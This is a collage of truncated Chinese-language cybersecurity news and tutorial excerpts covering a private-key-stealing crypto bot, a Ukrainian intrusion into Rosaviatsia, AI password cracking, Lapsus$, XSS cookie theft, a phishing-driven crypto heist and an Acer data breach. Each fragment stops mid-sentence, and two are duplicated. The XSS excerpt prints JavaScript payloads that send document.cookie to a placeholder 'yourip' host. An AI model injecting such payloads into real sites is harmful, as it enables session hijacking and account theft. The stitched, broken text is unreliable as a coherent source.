动机研究币圈科学家必备技能Solidity和web3也有一段时间了，也写了一些一级市场常用的功能，比如dex实时获取价格，dex自动购买，dex挂单交易等功能，并且已经投入使用。近期想看看其他人的科学家软件的实现方式，结果很不巧，找到的第一个“科学家”就是个骗子，给的软件无用不说，还会盗取私钥，接下来给大家分享一下过程。试探在电报上找到了一个机器人的宣传群组，这时候觉得老哥真敞亮，提供了程序下载，还提供了教学视频。不过现在币圈骗子横行，先聊几句看看这老哥懂不懂技术，还有这软件是不是他写的。装模做样问了老哥一些技术问题，嗯，感觉这老哥还是懂技术的，而且也比较有耐心，毕竟我是以陌生人的身份问他技术

BleepingComputer网站消息，乌克兰国防部下属情报部门声称，其团队成员成功侵入了俄罗斯联邦航空运输署（Rosaviatsia），揭露了所谓的俄罗斯航空业“崩溃”事件。据悉，Rosaviatsia主要职责是监督俄罗斯民航业，负责记录飞行或紧急事件。从乌克兰方面发布的公告来看，乌国防部下属情报部的工作人员侵入了俄罗斯Rosaviatsia 机构，窃取了大量文件，可以确定俄罗斯航空部门因为西方国家对备件和软件更新的制裁，导致无法正常修理飞机而遭受损失。据报道，自去年以来，俄罗斯飞机运营商就开始被迫拆除老旧飞机，以维持现有机队的运营。值得注意的是，此次网络攻击事件是首次有国家公开承认的国家

译者|陈峻审校|重楼现如今，随着人工智能（AI）应用的普及和快速迭代，几乎任何人都可以轻而易举地利用AI进行密码破解之类的攻击。这已经引起了业界的担忧。下面，我将围绕着：密码破解究竟意味着什么，基于AI的密码猜测技术，以及我们该如何保护自己的密码免受此类攻击这三个方面展开讨论。破解密码意味着什么？长期以来，密码始终是网络攻击者关注的焦点。他们只需获取密码，就能绕过所有的安全系统，攫取整个系统的相关信息，及其存储在其中的所有数据。让我们先来了解一下与密码破解有关的散列（哈希，hashing）概念。密码散列是一种通过更改原始记录中的数字，来安全地存储用户密码的方法。其过程为：对用户的真实密码（通常

注释:本文的lapsus与lapsus$为同一词，由于特殊字符可能不显示，有些地方省略了lapsus组织介绍Lapsus$一个黑客组织，2021年12月以入侵巴西卫生部而走进大众视野。此后的时间里，更是不断的公布自己的战利品，沦陷的巨头包括英伟达、三星、沃达丰，直至微软。这个组织和传统的商业犯罪黑客有一个很大的不同——非常喜欢show，为了展示一路上的“战利品”，它专门建了一个Telegram频道，将各种截图和数据逐一陈列、公诸于世，这也许就是为什么在2022年3月22日公布微软源代码后，于2022年3月27日就被逮捕(是否全部落网,并不得知)攻击事件2021/12/21公布攻击了巴西卫生部2

虽然cookie信息经过加密，即使被网络上一些别有用心的人截获也不必担心，但现在遇到的问题，窃取cookie的人不需要知道字符的含义，直接利用cookie通过服务器验证就可以冒充用户的身份 假设一个网站有存储型xss（或反射xss），攻击者可以写入窃取cookie信息的恶意代码，在用户浏览xss网页时，触发恶意代码获取用户的cookie 攻击者通常使用以下语句盗取用户cookie信息document.location='http://yourip/cookie.php?cookie='+document.cookie;newImage().src='http://yourip/cookie.p

网络钓鱼作为最常见的网络攻击方式,钓鱼手法层出不穷,黑客们有时伪装成银行客服,有时又变成律师。而现在,他们也许是正在物色人才的招聘人员,用一封假offer,造成史上最大的加密货币黑客事件。黑客动态播报网络安全态势愈演愈烈,如何确保数据安全已成为CIO、IT管理员们的头等大事。然而“我在明,敌在暗”,黑客的快速移动使得我们往往只能被动防御。同时,依靠背后庞大的犯罪网络,黑客层出不穷的攻击手段更让我们应对起来难上加难。欢迎来到黑客动态播报系列,在这里我们将持续更新黑客攻击手段、网络安全态势等最新动态,“知己知彼,方能百战百胜”,欢迎保持关注。链游安全遭受威胁一封offer酿成大祸提起区块链游戏,可

网络钓鱼作为最常见的网络攻击方式,钓鱼手法层出不穷,黑客们有时伪装成银行客服,有时又变成律师。而现在,他们也许是正在物色人才的招聘人员,用一封假offer,造成史上最大的加密货币黑客事件。黑客动态播报网络安全态势愈演愈烈,如何确保数据安全已成为CIO、IT管理员们的头等大事。然而“我在明,敌在暗”,黑客的快速移动使得我们往往只能被动防御。同时,依靠背后庞大的犯罪网络,黑客层出不穷的攻击手段更让我们应对起来难上加难。欢迎来到黑客动态播报系列,在这里我们将持续更新黑客攻击手段、网络安全态势等最新动态,“知己知彼,方能百战百胜”,欢迎保持关注。链游安全遭受威胁一封offer酿成大祸提起区块链游戏,可

电脑制造商宏碁公司确认，有人入侵了其一台服务器，并在网上出售声称是宏碁机密信息的160GB数据。“我们最近发现了一起未经授权访问我们维修技术人员文档服务器的事件，”宏碁发言人周二说，“目前我们的调查仍在进行中，但没有迹象表明该服务器上存储了任何消费者数据。”据网络犯罪论坛BreachForums上一个化名为Kernelware的黑客周一发布的帖子称，从宏碁窃取的“各种机密资料”共计160GB，包括655个目录和2,869个文件。Kernelware声称窃取的资料包括机密幻灯片和演示文稿、员工技术手册、Windows镜像格式文件、二进制文件、后端基础设施数据、机密产品文档、替换数字产品密钥、IS

电脑制造商宏碁公司确认，有人入侵了其一台服务器，并在网上出售声称是宏碁机密信息的160GB数据。“我们最近发现了一起未经授权访问我们维修技术人员文档服务器的事件，”宏碁发言人周二说，“目前我们的调查仍在进行中，但没有迹象表明该服务器上存储了任何消费者数据。”据网络犯罪论坛BreachForums上一个化名为Kernelware的黑客周一发布的帖子称，从宏碁窃取的“各种机密资料”共计160GB，包括655个目录和2,869个文件。Kernelware声称窃取的资料包括机密幻灯片和演示文稿、员工技术手册、Windows镜像格式文件、二进制文件、后端基础设施数据、机密产品文档、替换数字产品密钥、IS